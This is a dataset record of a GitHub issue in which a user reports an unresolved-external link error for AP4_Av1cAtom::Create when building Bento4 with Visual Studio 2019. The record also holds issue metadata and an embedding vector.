[ "axiomatic-systems", "Bento4" ]
I used to just execute the following command line to build _Bento4_ from _master_ branch: ``` cd .\Build\Targets\x86_64-microsoft-win32-vs2019 . "C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\MSBuild\Current\Bin\MSBuild.exe" .\Bento4.sln -p:Configuration=Release ``` Last time it worked was February 1st. Today after `git pull` that command yielded a link error: > Bento4.lib(Ap4AtomFactory.obj) : error LNK2019: unresolved external symbol "public: static class AP4_Av1cAtom * __cdecl AP4_Av1cAtom::Create(unsigned int,class AP4_ByteStream &)" (?Create@AP4_Av1cAtom@@SAPAV1@IAAVAP4_ByteStream@@@Z) referenced in function "public: virtual int __thiscall AP4_AtomFactory::CreateAtomFromStream(class AP4_ByteStream &,unsigned int,unsigned int,unsigned __int64,class AP4_Atom * &)" (?CreateAtomFromStream@AP4_AtomFactory@@UAEHAAVAP4_ByteStream@@II_KAAPAVAP4_Atom@@@Z) [C:\Projects\ncps-encoder\Bento4\Build\Targets\x86_64-microsoft-win32-vs2019\Mp42Aac\Mp42Aac.vcxproj] Am I missing something?
Error building master on Windows
https://api.github.com/repos/axiomatic-systems/Bento4/issues/594/comments
1
2021-04-06T22:48:47
2023-06-14T01:02:26Z
https://github.com/axiomatic-systems/Bento4/issues/594
851,863,540
594
false
This is a GitHub Issue repo:Bento4 owner:axiomatic-systems Title : Error building master on Windows Issue date: --- start body --- I used to just execute the following command line to build _Bento4_ from _master_ branch: ``` cd .\Build\Targets\x86_64-microsoft-win32-vs2019 . "C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\MSBuild\Current\Bin\MSBuild.exe" .\Bento4.sln -p:Configuration=Release ``` Last time it worked was February 1st. Today after `git pull` that command yielded a link error: > Bento4.lib(Ap4AtomFactory.obj) : error LNK2019: unresolved external symbol "public: static class AP4_Av1cAtom * __cdecl AP4_Av1cAtom::Create(unsigned int,class AP4_ByteStream &)" (?Create@AP4_Av1cAtom@@SAPAV1@IAAVAP4_ByteStream@@@Z) referenced in function "public: virtual int __thiscall AP4_AtomFactory::CreateAtomFromStream(class AP4_ByteStream &,unsigned int,unsigned int,unsigned __int64,class AP4_Atom * &)" (?CreateAtomFromStream@AP4_AtomFactory@@UAEHAAVAP4_ByteStream@@II_KAAPAVAP4_Atom@@@Z) [C:\Projects\ncps-encoder\Bento4\Build\Targets\x86_64-microsoft-win32-vs2019\Mp42Aac\Mp42Aac.vcxproj] Am I missing something? --- end body ---
1,169
[ -0.019146736711263657, 0.020259056240320206, -0.011938902549445629, 0.020911619067192078, 0.0403994657099247, -0.012443154118955135, -0.025182927027344704, 0.04920904338359833, -0.008431386202573776, 0.04087405651807785, 0.006173376459628344, -0.015780115500092506, 0.01038165483623743, 0.006900092586874962, -0.00576923368498683, 0.017900938168168068, -0.02847539447247982, -0.018256880342960358, -0.01701108179986477, -0.02639906480908394, 0.030878005549311638, -0.004868254531174898, 0.010611534118652344, 0.029647039249539375, -0.017737798392772675, -0.020036593079566956, -0.008312739431858063, -0.0027437228709459305, -0.010062789544463158, 0.009091363288462162, 0.008119937032461166, 0.0016360374866053462, 0.004034014418721199, 0.012250352650880814, 0.05721774697303772, 0.033547576516866684, 0.030937330797314644, 0.03135259449481964, -0.01868697814643383, 0.013333010487258434, -0.042980048805475235, -0.012087211944162846, -0.02028871886432171, -0.0001539868098916486, 0.005242735613137484, -0.0018826017621904612, 0.013726030476391315, 0.005487445741891861, -0.009024623781442642, 0.0067777372896671295, -0.007712086196988821, -0.03959859535098076, -0.019828960299491882, -0.07296819984912872, 0.012762019410729408, -0.03630612790584564, -0.009654938243329525, 0.013384918682277203, -0.0449080690741539, 0.03971724212169647, -0.013473904691636562, 0.01788610778748989, -0.0053984601981937885, 0.022439204156398773, 0.002906863344833255, 0.05606093257665634, -0.02329939790070057, 0.05101841688156128, -0.030433079227805138, -0.0012828758917748928, 0.009046870283782482, -0.01308829989284277, 0.016551323235034943, 0.013125377707183361, 0.0008439728990197182, -0.062289927154779434, 0.020229395478963852, -0.0017519041430205107, -0.04042913019657135, 0.039657920598983765, -0.029350420460104942, -0.00007438640750478953, -0.0565948486328125, -0.0002123836165992543, 0.012443154118955135, 0.031738199293613434, -0.02749655395746231, -0.06703582406044006, -0.0480818897485733, -0.019072582945227623, 0.01669963262975216, 0.03437810763716698, 0.03150090575218201, -0.017381856217980385, 0.0065626888535916805, 0.04609454423189163, -0.010974891483783722, -0.015045983716845512, -0.05092943087220192, -0.04354362562298775, -0.001063192612491548, -0.05330238118767738, 0.036335788667201996, -0.009973803535103798, 0.038946036249399185, 0.0087650828063488, 0.025968967005610466, -0.016373351216316223, 0.004441864788532257, 0.0925450325012207, -0.008550033904612064, -0.007445129100233316, 0.0029495020862668753, -0.01913190633058548, 0.007890057750046253, 0.01425994373857975, -0.024456212297081947, -0.01193148735910654, -0.0025397976860404015, 0.003668802557513118, -0.000799016619566828, -0.007667593192309141, -0.018939103931188583, -0.02192012220621109, -0.0238184817135334, 0.008164430037140846, -0.00209857732988894, -0.018123403191566467, 0.0015294401673600078, 0.01317728590220213, -0.022112924605607986, -0.0022728408221155405, 0.018568331375718117, -0.021490024402737617, -0.001586909987963736, -0.02325490675866604, 0.010411316528916359, 0.02967670001089573, -0.0022042477503418922, 0.012947405688464642, -0.02178664319217205, -0.017648812383413315, 0.03962825983762741, -0.024382056668400764, -0.005487445741891861, -0.04419618472456932, -0.009069116786122322, 0.025360899046063423, -0.007167049217969179, -0.02272099256515503, -0.019739974290132523, -0.03072969615459442, 0.03553491830825806, 0.019992100074887276, 0.005606093443930149, 0.004764437675476074, -0.009387982077896595, -0.00317752780392766, 0.005224196705967188, 0.008312739431858063, 0.013933663256466389, -0.03467472642660141, 0.022468866780400276, 0.005187119357287884, -0.00265102949924767, -0.03158989176154137, 0.010329745709896088, 0.014037479646503925, -0.054666824638843536, 0.0114494813606143, 0.0025435052812099457, 0.0368400439620018, -0.021445531398057938, 0.010878490284085274, -0.040903717279434204, 0.004297263454645872, -0.007248619571328163, 0.05908644571900368, -0.0033351064193993807, -0.05128537118434906, -0.013666706159710884, 0.03583153709769249, 0.016684802249073982, -0.013844677247107029, 0.02896481566131115, -0.01589876227080822, 0.028860999271273613, -0.0368400439620018, 0.02493080124258995, 0.01350356638431549, -0.004026598762720823, -0.004252770449966192, 0.02120823599398136, -0.0028160237707197666, 0.03574255481362343, -0.004215693101286888, -0.028149114921689034, -0.020881956443190575, -0.029602546244859695, 0.01062636449933052, 0.022602343931794167, -0.010151774622499943, -0.016106395050883293, 0.005328013561666012, -0.023966791108250618, -0.00637730211019516, -0.03331027925014496, 0.061222098767757416, 0.03870873898267746, -0.027971142902970314, -0.03378487005829811, -0.01477161142975092, -0.02068915404379368, -0.0036484100855886936, 0.03998420014977455, 0.013703783974051476, -0.02426340989768505, 0.017292870208621025, -0.048289522528648376, 0.015691129490733147, -0.007263450417667627, -0.01612122543156147, 0.026992302387952805, 0.00030890057678334415, -0.03396284207701683, -0.006814814638346434, 0.014571393840014935, -0.03864941745996475, -0.0025472131092101336, -0.014067141339182854, 0.005428122356534004, 0.003372183768078685, -0.00875025149434805, -0.0035371780395507812, 0.030937330797314644, -0.0175301656126976, 0.00268996087834239, -0.01461588591337204, -0.014319268055260181, 0.014541731216013432, 0.03657308593392372, 0.035445936024188995, -0.03698835149407387, -0.046658121049404144, 0.02444138005375862, 0.03936130180954933, -0.0036020632833242416, 0.02395196072757244, -0.022691329941153526, -0.013874339871108532, 0.030136460438370705, 0.02697747014462948, 0.035445936024188995, -0.004890500567853451, 0.0007304235477931798, -0.007092894520610571, 0.030017811805009842, 0.0159432552754879, -0.00637730211019516, -0.04508604109287262, -0.005828557536005974, -0.009017208591103554, 0.0062994398176670074, 0.0000430155050707981, 0.0038337965961545706, -0.031293272972106934, -0.02936525084078312, 0.008831821382045746, -0.006173376459628344, -0.033102646470069885, 0.02657703496515751, -0.010166605934500694, -0.008127352222800255, -0.0017519041430205107, -0.012064965441823006, -0.03046273998916149, 0.0471327118575573, 0.009758755564689636, -0.009884818457067013, 0.0005709910183213651, -0.010433563031256199, 0.007934549823403358, -0.001339418813586235, 0.012695279903709888, 0.012339337728917599, -0.001571152126416564, 0.00012884374882560223, -0.048111554235219955, -0.040547776967287064, 0.030358923599123955, 0.007712086196988821, 0.03532728552818298, -0.06923080235719681, 0.011479143984615803, 0.0038523352704942226, -0.00414153840392828, -0.005405875854194164, 0.007122556678950787, 0.005431829951703548, 0.016862772405147552, -0.0323314368724823, -0.008119937032461166, 0.0017769313417375088, -0.04069608449935913, -0.05457783862948418, -0.005865634884685278, 0.014697456732392311, 0.01001088134944439, 0.00788264162838459, 0.0006567323580384254, 0.03503066673874855, -0.007697255350649357, -0.015186876989901066, 0.0024915970861911774, -0.051522668451070786, -0.0018955788109451532, 0.017307700589299202, -0.035178977996110916, -0.04968363046646118, 0.016225041821599007, -0.04336565360426903, 0.013740860857069492, -0.07486655563116074, 0.013421996496617794, 0.00012432494258973747, -0.01554282009601593, -0.01107129268348217, -0.0040303063578903675, -0.015246201306581497, 0.004126707557588816, 0.01770813576877117, 0.009150686673820019, 0.01153846736997366, -0.015705959871411324, 0.025568531826138496, -0.04381057992577553, 0.0006071414100006223, -0.02582065761089325, -0.005120380315929651, 0.009009793400764465, -0.028638536110520363, 0.017114898189902306, -0.019547171890735626, -0.017352193593978882, -0.013696368783712387, -0.017678475007414818, 0.007159634027630091, -0.03707733750343323, 0.04034014418721199, 0.02165316417813301, 0.0009603030048310757, 0.01598774828016758, 0.018345866352319717, -0.03191617131233215, 0.02816394530236721, -0.034081488847732544, -0.0006344859139062464, -0.03298399969935417, 0.04787425696849823, 0.034526415169239044, -0.01939886249601841, -0.03197549656033516, 0.021638333797454834, 0.04247579723596573, -0.006258654408156872, -0.01463813241571188, -0.019428525120019913, -0.021593840792775154, -0.017678475007414818, -0.012050134129822254, -0.0067184134386479855, 0.050810784101486206, -0.030611049383878708, 0.010960061103105545, 0.009002377279102802, -0.037967193871736526, 0.02484181523323059, 0.025702010840177536, -0.039657920598983765, 0.026428725570440292, -0.02055567502975464, 0.003761495929211378, 0.048111554235219955, -0.024723168462514877, 0.011760931462049484, -0.01567629724740982, -0.005887880921363831, 0.006191915366798639, -0.03325095772743225, -0.03295433893799782, -0.016847942024469376, -0.00031144963577389717, -0.024159593507647514, -0.05686180293560028, -0.025093941017985344, 0.02519775927066803, -0.019903114065527916, -0.01319953240454197, 0.016136057674884796, -0.0034667309373617172, 0.007304235361516476, -0.030017811805009842, 0.03968758136034012, -0.02356635592877865, -0.0035798170138150454, 0.05273880437016487, -0.0009575222502462566, -0.03037375397980213, 0.0016888726968318224, 0.03716632351279259, -0.0016638454981148243, -0.019324708729982376, -0.02577616460621357, 0.009677184745669365, 0.02369983308017254, 0.018212387338280678, 0.0027437228709459305, -0.0035093699116259813, -0.006529319100081921, 0.030611049383878708, 0.02245403453707695, -0.004308386705815792, 0.005383629351854324, -0.014274775050580502, 0.04007318615913391, 0.003948736470192671, -0.008898560889065266, 0.008008704520761967, -0.035267964005470276, -0.005220489110797644, 0.0014460161328315735, -0.04419618472456932, 0.05333204194903374, 0.022394711151719093, -0.00736355921253562, -0.041823238134384155, 0.02089678682386875, -0.033903516829013824, -0.02062983065843582, -0.023062104359269142, 0.016773788258433342, 0.04606488347053528, -0.01793060079216957, -0.015483495779335499, 0.009551121853291988, -0.04754797741770744, -0.038115501403808594, -0.001296779839321971, 0.000029589453333755955, -0.004008060321211815, 0.0408443957567215, 0.008505540899932384, 0.002358118537813425, 0.008409139700233936, -0.0025231128092855215, 0.007726917043328285, 0.02015523985028267, 0.03434844687581062, 0.025346066802740097, -0.048289522528648376, -0.00218014745041728, -0.004037722013890743, 0.0032294359989464283, 0.008075444027781487, -0.011360496282577515, 0.02107475884258747, -0.02981017902493477, -0.04250545799732208, 0.0027344536501914263, -0.011694191955029964, 0.017307700589299202, -0.0022543021477758884, 0.045056380331516266, 0.006021359469741583, -0.000530669407453388, 0.005227904766798019, -0.015335186384618282, -0.03405182808637619, -0.005454076454043388, -0.03799685463309288, -0.03307298570871353, 0.0030143875628709793, 0.002615806180983782, -0.009558537974953651, -0.01993277668952942, -0.009514044970273972, 0.0006701728561893106, -0.00369846448302269, -0.03514931723475456, 0.03514931723475456, 0.011961149051785469, 0.010270422324538231, 0.02024422585964203, -0.012324506416916847, 0.025494376197457314, 0.021534517407417297, -0.008609357289969921, 0.011264095082879066, 0.01828654296696186, 0.021549347788095474, 0.009358319453895092, -0.010040543042123318, 0.007689839694648981, -0.002604682929813862, 0.032568734139204025, -0.06525611132383347, 0.017811952158808708, 0.007808487396687269, 0.0019984685350209475, -0.015350017696619034, -0.0020170072093605995, -0.028846168890595436, -0.005950912833213806, -0.031649213284254074, -0.05514141544699669, -0.011382742784917355, -0.002458227565512061, 0.005598677787929773, 0.011901825666427612, -0.0014107926981523633, -0.014133880846202374, -0.04912005737423897, -0.0021875628735870123, 0.04131898283958435, -0.006944585125893354, -0.003754080506041646, -0.005023979116231203, -0.011056462302803993, 0.03132293373346329, 0.01962132751941681, -0.018078910186886787, -0.009135856293141842, 0.016758956015110016, 0.034645065665245056, -0.025968967005610466, 0.004519727546721697, 0.007541530299931765, 0.012999314814805984, -0.01432668324559927, -0.0073598516173660755, -0.04158594086766243, 0.0027622615452855825, -0.034081488847732544, 0.01348873507231474, -0.04211985319852829, -0.010396485216915607, 0.050247207283973694, 0.019502678886055946, 0.026784667745232582, 0.01313279289752245, 0.004464111290872097, -0.0038263811729848385, 0.012576633132994175, 0.023581186309456825, -0.01158296037465334, 0.010833998210728168, -0.008068028837442398, 0.012702696025371552, 0.00788264162838459, 0.0269329771399498, -0.01837552897632122, 0.007233788259327412, 0.003468584967777133, -0.012102043256163597, -0.009276749566197395, -0.0012884375173598528, 0.03458574041724205, -0.007941965945065022, -0.046569135040044785, -0.0035167853347957134, 0.013340425677597523, -0.013555474579334259, 0.04739966616034508, 0.01784161478281021, -0.012235521338880062, 0.029869502410292625, 0.028178775683045387, -0.033102646470069885, -0.02542022243142128, -0.020392535254359245, 0.06513746827840805, -0.020170072093605995, -0.03153056651353836, 0.02249852754175663, 0.008876314386725426, 0.008557449094951153, -0.0017185346223413944, -0.005175996106117964, 0.006466287653893232, -0.026636358350515366, -0.00832756981253624, 0.01904292032122612, -0.00414153840392828, -0.017871277406811714, 0.020926449447870255, -0.018078910186886787, 0.008631603792309761, 0.03203481808304787, 0.060866158455610275, 0.010960061103105545, -0.009439890272915363, 0.01350356638431549, 0.0016360374866053462, -0.0278524961322546, -0.02183113619685173, 0.024411719292402267, -0.011130617000162601, -0.003748518880456686, -0.028134282678365707, 0.02439688704907894, -0.03064071200788021, 0.014111634343862534, 0.04229782521724701, -0.01647716946899891, 0.00834981631487608, 0.023551523685455322, 0.003505662316456437, 0.024500705301761627, -0.004056260455399752, 0.00786039512604475, 0.02945423685014248, 0.0009667915874160826, 0.016981421038508415, -0.011968564242124557, -0.006748075596988201, 0.04149695485830307, 0.018449682742357254, -0.007174464873969555, -0.008423971012234688, -0.025494376197457314, -0.04538265988230705, 0.0006516341818496585, -0.00949921365827322, 0.01188699435442686, -0.022335387766361237, -0.017826784402132034, 0.04022149369120598, -0.010544794611632824, 0.006814814638346434, -0.01545383408665657, -0.02129722200334072, -0.022973118349909782, -0.0035853784065693617, 0.031678877770900726, -0.02015523985028267, -0.0046939910389482975, -0.004011767916381359, 0.023373553529381752, 0.011086123995482922, 0.0094324741512537, -0.027526214718818665, 0.008564865216612816, 0.0009130294201895595, 0.010529963299632072, 0.003511223942041397, -0.029736025258898735, -0.011397573165595531, 0.04425550997257233, 0.018716638907790184, -0.004820053931325674, -0.03755192831158638, 0.000396264047594741, 0.004056260455399752, 0.010433563031256199, 0.0197548046708107, 0.007912303321063519, -0.01162745337933302, 0.01712973043322563, 0.02236505039036274, 0.01793060079216957, 0.012324506416916847, -0.011938902549445629, -0.012858420610427856, 0.032746702432632446, -0.006751783192157745, -0.02200910821557045, 0.007026155479252338, 0.02834191732108593, -0.008876314386725426, 0.007000201381742954, -0.008468464016914368, -0.004994317423552275, 0.0048979162238538265, 0.004757022485136986, -0.020214565098285675, 0.007630515843629837, 0.001305122277699411, -0.026517711579799652, -0.005531938746571541, -0.052086241543293, 0.037047676742076874, 0.007867811247706413, 0.010040543042123318, -0.010188852436840534, -0.02745206095278263, -0.004282432608306408, 0.03081868216395378, -0.03393317759037018, -0.013192116282880306, -0.028267761692404747, 0.0069223386235535145, 0.0035445934627205133, -0.017203884199261665, 0.001331076375208795, -0.013763107359409332, 0.002063353778794408, -0.002587998053058982, -0.013748276978731155, 0.002447104314342141, 0.005087010562419891, -0.00023729495296720415, 0.010122112929821014, 0.011879579164087772, -0.018657315522432327, -0.012851005420088768, 0.0019335831748321652, -0.016061902046203613, 0.0014256236609071493, -0.004245355259627104, -0.016818279400467873, 0.008342401124536991, -0.004912747070193291, -0.033102646470069885, -0.024278240278363228, -0.028282592073082924, 0.013585136272013187, 0.010707935318350792, 0.011293756775557995, 0.010611534118652344, -0.0015655906172469258, 0.0008588038035668433, -0.016758956015110016, 0.013992986641824245, 0.01926538348197937, -0.03592052310705185, -0.0038337965961545706, -0.006444041151553392, -0.009002377279102802, 0.05404392629861832, 0.0012643372174352407, -0.00010132540774066001, 0.04149695485830307, -0.015275862999260426, -0.020748477429151535, 0.001073388964869082, 0.0012254059547558427, -0.014437914825975895, 0.010322330519557, -0.035178977996110916, -0.02639906480908394, 0.02421891689300537, -0.010159190744161606, -0.017915768548846245, -0.052679479122161865, 0.037136662751436234, -0.019769636914134026, 0.04600555822253227, -0.014104219153523445, 0.0048274691216647625, -0.008802159689366817, -0.007370974402874708, -0.036869704723358154, -0.013777938671410084, -0.00010335307888453826, 0.017322532832622528, -0.037967193871736526, 0.023996451869606972, -0.014830934815108776, 0.020970942452549934, 0.004286140203475952, -0.021148912608623505, -0.010574456304311752, -0.027377905324101448, -0.020051423460245132, 0.013592551462352276, -0.004119292367249727, -0.057988956570625305, -0.010225929319858551, -0.026636358350515366, 0.002117116004228592, -0.0318865105509758, 0.008631603792309761, -0.03117462433874607, 0.02019973285496235, 0.019517511129379272, -0.011590375564992428, 0.0038931204471737146, -0.013718614354729652, 0.032479748129844666, 0.010930399410426617, -0.00958819966763258, -0.030136460438370705, 0.058166924864053726, 0.010848828591406345, 0.030047474429011345, -0.005880465731024742, 0.009046870283782482, 0.02430790290236473, -0.018494175747036934, -0.02006625570356846, 0.021326884627342224, 0.012532140128314495, -0.0022320556454360485, -0.0040525528602302074, -0.026740174740552902, -0.008045782335102558, -0.0056135086342692375, 0.015216539613902569, -0.03918332979083061, 0.03212380409240723, -0.01219844352453947, -0.02843090146780014, 0.01262112520635128, 0.018004754558205605, 0.005594970192760229, 0.00266771437600255, -0.01828654296696186, -0.01643267646431923, 0.024115100502967834, 0.03250940889120102, -0.04499705508351326, 0.02187562920153141, 0.04508604109287262, -0.004712529480457306, -0.002721476601436734, -0.00803836714476347, 0.020970942452549934, 0.002100431127473712, 0.012161366641521454, 0.006088098976761103, -0.00019129588326904923, -0.010107282549142838, -0.034704387187957764, 0.020807800814509392, -0.0059323739260435104, 0.023655341938138008, 0.01184991654008627, 0.011293756775557995, -0.016491999849677086, 0.0471327118575573, -0.05060315132141113, -0.010900736786425114, -0.006655381992459297, -0.021490024402737617, 0.003147865878418088, -0.018805624917149544, -0.002600975101813674, -0.019917946308851242, 0.01151622086763382, -0.009669769555330276, 0.0073487283661961555, 0.009328657761216164, 0.00023103815328795463, 0.014163542538881302, 0.016195381060242653, 0.011234433390200138, -0.013288517482578754, -0.02321041375398636, 0.020466690883040428, -0.037047676742076874, 0.03681037947535515, 0.021727319806814194, 0.007756578736007214, -0.017826784402132034, 0.02111925184726715, 0.029291097074747086, 0.011219602078199387, -0.010522548109292984, 0.01317728590220213, 0.004204569850116968, -0.010826582089066505, -0.04410719871520996, -0.017678475007414818, 0.002131946850568056, -0.022602343931794167, 0.01107129268348217, -0.0027715309988707304, -0.008824406191706657, 0.007485914509743452, 0.01687760464847088, -0.005728448741137981, 0.009692016057670116, -0.004627251531928778, -0.03434844687581062, 0.0114494813606143, -0.03497134521603584, 0.010589287616312504, -0.01273235771805048, -0.033013660460710526, -0.01104904618114233, 0.008297908119857311, 0.014386006630957127, -0.004148954059928656, 0.009328657761216164, 0.0059916977770626545, -0.0019094828749075532, 0.002643614076077938, -0.015572481788694859, -0.020822633057832718, -0.022528190165758133, -0.006425502710044384, -0.003481562016531825, -0.03135259449481964, -0.00783814862370491, -0.009514044970273972, -0.007370974402874708, 0.002905009314417839, 0.014882843010127544, 0.009113609790802002, -0.0007197638042271137, 0.031055977568030357, 0.020496351644396782, 0.011968564242124557, 0.0009079313022084534, -0.037403617054224014, 0.03242042288184166, 0.013614797964692116, -0.009017208591103554, 0.004156369715929031, 0.03725530952215195, -0.009825494140386581, 0.030344093218445778, -0.012035303749144077, 0.029172448441386223, -0.003804134903475642, -0.014934751205146313, 0.0008648288785479963, 0.033547576516866684, 0.029335590079426765, 0.0030718573834747076, 0.0025972675066441298, -0.01859799213707447, -0.018657315522432327, -0.019013257697224617, -0.01779712177813053, -0.02024422585964203, 0.006911215838044882, -0.017085237428545952, 0.007530407048761845, -0.01877596415579319, -0.005320597905665636, -0.03170853853225708, -0.016447506844997406, -0.019369201734662056, 0.018434852361679077, 0.020273888483643532, 0.003222020575776696, 0.011790593154728413, -0.018093740567564964, 0.001853866851888597, -0.0032164589501917362, -0.03784854710102081, -0.00022837321739643812, -0.013310763984918594, -0.014949582517147064, 0.038946036249399185, -0.012546970508992672, -0.006143714766949415, -0.006584934890270233, -0.0007100310176610947, 0.006814814638346434, 0.022290894761681557, 0.013874339871108532, -0.029795348644256592, 0.03158989176154137, 0.031144963577389717, -0.014096803963184357, 0.008231168612837791, -0.01262112520635128, -0.033280618488788605, 0.013355256989598274, 0.004093337804079056, -0.02062983065843582, 0.030344093218445778, -0.017871277406811714, 0.007066940423101187, 0.02160867303609848, 0.0072671580128371716, 0.0027344536501914263, 0.0030125335324555635, -0.01107129268348217, -0.005672832485288382, 0.05306508392095566, 0.00024540562299080193, 0.009818078950047493, -0.017025914043188095, 0.03286535292863846, 0.03170853853225708, -0.03016612119972706, 0.00801612064242363, -0.01064861100167036, 0.030848344787955284, 0.040013860911130905, -0.013340425677597523, 0.030002981424331665, 0.03156023100018501, -0.0015071937814354897, -0.015305524691939354, 0.0008194091496989131, -0.04606488347053528, -0.017604319378733635, -0.004460403695702553, -0.012191028334200382, -0.009825494140386581, -0.008601942099630833, 0.025301575660705566, 0.027170272544026375, 0.00998863484710455, -0.037967193871736526, 0.018701808527112007, 0.005962035618722439, -0.009284165687859058, 0.007411759812384844, -0.02564268559217453, -0.025583362206816673, 0.015972916036844254, 0.03135259449481964, 0.0065033650025725365, 0.031827185302972794, 0.02568717859685421, 0.002617659978568554, -0.004378833342343569, 0.01607673428952694, -0.006032482720911503, 0.009981218725442886, 0.01718905381858349, -0.007118848618119955, 0.011575544252991676, 0.017589488998055458, 0.03191617131233215, 0.0017973239300772548, 0.01788610778748989, 0.018182726576924324, 0.0002949965710286051, -0.0028030467219650745, -0.01979929767549038, 0.019873453304171562, -0.013451658189296722, -0.009106193669140339, 0.015616974793374538, 0.033458590507507324, 0.007667593192309141, -0.0309966541826725, 0.002393342088907957, 0.0020448151044547558, 0.02218707837164402, 0.02702196314930916, -0.00690750777721405, -0.016225041821599007, -0.00037656669155694544, 0.016462337225675583, 0.020881956443190575, 0.02528674341738224, -0.025983797386288643, 0.0228989627212286, -0.016996251419186592, 0.02147519402205944, -0.0033684761729091406, -0.003970982972532511, 0.0018890902865678072, -0.0038634585216641426, -0.03675105795264244, 0.011412404477596283, -0.00998863484710455, -0.009217426180839539, 0.012205859646201134, -0.0072894045151770115, 0.024011284112930298, 0.0056950789876282215, 0.04309869557619095, 0.016773788258433342, -0.018879780545830727, -0.017263207584619522, -0.014245113357901573, 0.008082859218120575, 0.00992189534008503, 0.013347841799259186, -0.008824406191706657, 0.010174021124839783, -0.0022524483501911163, -0.013295932672917843, -0.012465400621294975, 0.001080804388038814, 0.031441580504179, -0.019680650904774666, 0.0039079515263438225, -0.009306411258876324, -0.0015516865532845259, -0.015928424894809723, -0.01149397436529398, -0.019636157900094986, -0.012072380632162094, -0.005020271521061659, -0.018049247562885284, -0.02945423685014248, -0.01723354682326317, 0.002988433465361595, 0.10067238658666611, 0.0036335790064185858, -0.02988433465361595, 0.001331076375208795, -0.017871277406811714, -0.002599121304228902, -0.02200910821557045, -0.026206262409687042, 0.016640309244394302, 0.024426549673080444, 0.0019743682350963354, -0.0006534880958497524, -0.014645548537373543, 0.0327763669192791, 0.02037770487368107, 0.0001890944258775562, 0.028549550101161003, -0.014185789041221142, -0.011011969298124313, -0.012977068312466145, -0.008735420182347298, 0.010618949308991432, 0.014690040610730648, -0.03339926525950432, 0.008994962088763714, -0.031441580504179, -0.004931285977363586, 0.001354249776341021, -0.011664530262351036, -0.012465400621294975, -0.012057550251483917, 0.027333412319421768, 0.009417643770575523, -0.015320356003940105, 0.0022320556454360485, -0.021415870636701584, -0.0041007534600794315, -0.013014145195484161, 0.004263893701136112, -0.023240074515342712, -0.0025342360604554415, -0.028890661895275116, 0.0002829464210662991, -0.012005642056465149, -0.02727408893406391, -0.032212790101766586, 0.016358520835638046, 0.0199772696942091, -0.0007429371471516788, -0.00870575848966837, 0.00013579575170297176, -0.02662152796983719, -0.007148510776460171, 0.045857250690460205, -0.015468665398657322, 0.004078506957739592, 0.01472711842507124, 0.023284567520022392, -0.01710006780922413, -0.01589876227080822, 0.008475879207253456, -0.00434917164966464, 0.014578809030354023, 0.011501389555633068, 0.03224245086312294, 0.014586224220693111, -0.03645443916320801, -0.02390746772289276, 0.00572474068030715, -0.0035668397322297096, 0.007204126566648483, 0.01345907337963581, 0.0033888686448335648, 0.009514044970273972, 0.003442630870267749, 0.01895393431186676, -0.0181975569576025, 0.03135259449481964, -0.033280618488788605, -0.003116350155323744, 0.015424172393977642, 0.015735622495412827, -0.014652963727712631, -0.001840889803133905, -0.023981621488928795, 0.0013690806226804852, -0.0070632328279316425, -0.013688952662050724, -0.00803836714476347, -0.0047051142901182175, -0.009247087873518467, -0.011412404477596283, 0.030611049383878708, -0.0007494256715290248, -0.0067999837920069695, -0.004868254531174898, -0.007471083663403988, 0.01434892974793911, -0.008920807391405106, -0.037492603063583374, 0.02665119059383869, 0.015261031687259674, 0.022068431600928307, -0.006006528623402119, 0.002929109614342451, 0.0033388142473995686, 0.0024786200374364853, 0.029305927455425262, 0.004927577916532755, -0.008809574879705906, 0.003702172078192234, 0.005569016095250845, -0.03227211534976959, -0.03897569701075554, -0.011308588087558746, -0.02617659978568554, 0.017945431172847748, 0.014764195308089256, -0.01224293652921915, -0.020081086084246635, -0.014133880846202374, -0.011464312672615051, 0.028134282678365707, -0.000028228019800735638, 0.003477854188531637, 0.02555370144546032, -0.02276548556983471, 0.0019298753468319774, 0.011597790755331516, 0.003099665278568864, -0.005153750069439411, 0.0008898560772649944, 0.011397573165595531, -0.02905380167067051, 0.02639906480908394, -0.00907653197646141, 0.009766170755028725, 0.025346066802740097, 0.012361584231257439, -0.0065144882537424564, -0.03918332979083061, 0.013229194097220898, 0.004590174183249474, 0.022350218147039413, 0.030966991558670998, 0.012769434601068497, 0.00596574367955327, -0.007040986325591803, 0.03360689803957939, -0.007534115109592676, -0.0007225446170195937, -0.0480818897485733, -0.008045782335102558, 0.014096803963184357, -0.006106637418270111, -0.02240954339504242, 0.026814330369234085, -0.0005853584734722972, 0.0024489581119269133, -0.0012652641162276268, 0.01104904618114233, 0.023877805098891258, 0.018716638907790184, 0.007749163545668125, 0.021860798820853233, 0.017203884199261665, -0.0052538588643074036, -0.005620924290269613, -0.01770813576877117, -0.028060128912329674, -0.011968564242124557, 0.017604319378733635, -0.027036793529987335, -0.0238184817135334, 0.027140609920024872, 0.0051834117621183395, -0.015186876989901066, 0.01868697814643383, 0.02417442388832569, 0.001070608152076602, 0.018227219581604004, 0.00258058262988925, -0.006996493320912123, -0.018761131912469864, 0.037136662751436234, -0.030670372769236565, 0.010433563031256199, 0.00961044616997242, -0.03853076696395874, 0.016669970005750656, 0.02089678682386875, 0.028846168890595436, -0.014838350005447865, -0.025479545816779137, 0.004934993572533131, -0.01890944130718708, -0.016551323235034943, -0.009632691740989685, -0.015557650476694107, -0.011612622067332268, 0.005587554536759853, 0.0027900696732103825, 0.011360496282577515, 0.009180348366498947, 0.004271309357136488, -0.02352186292409897, -0.027333412319421768, 0.012791681103408337, 0.020807800814509392, 0.00013915587624069303, -0.024500705301761627, 0.009758755564689636, -0.003488977439701557, 0.015913592651486397, 0.02639906480908394, 0.007986458018422127, 0.00905428547412157, -0.03141191974282265, -0.0030273646116256714, 0.005513399839401245, 0.012317091226577759, -0.0031070809345692396, -0.010982307605445385, -0.01080433651804924, -0.014882843010127544, -0.005064764060080051, 0.038768064230680466, 0.015023737214505672, -0.011152862571179867, 0.00596574367955327, 0.002867931965738535, 0.0184200219810009, 0.004523435141891241, 0.017337363213300705, -0.005669124890118837, -0.045145366340875626, 0.009172933176159859, -0.03262805566191673, 0.01118252519518137, -0.03612815588712692, -0.0027808002196252346, -0.012450570240616798, -0.03414081037044525, 0.006362471263855696, -0.003735541831701994, -0.0002637125726323575, 0.0015600289916619658, 0.01948784850537777, -0.014170958660542965, 0.034170474857091904, -0.008735420182347298, 0.0013523958623409271, -0.0037837421987205744, 0.007044693920761347, -0.002441542688757181, 0.038234151899814606, 0.010997137986123562, -0.02731858193874359, 0.012324506416916847, -0.02258751355111599, 0.00046647925046272576, 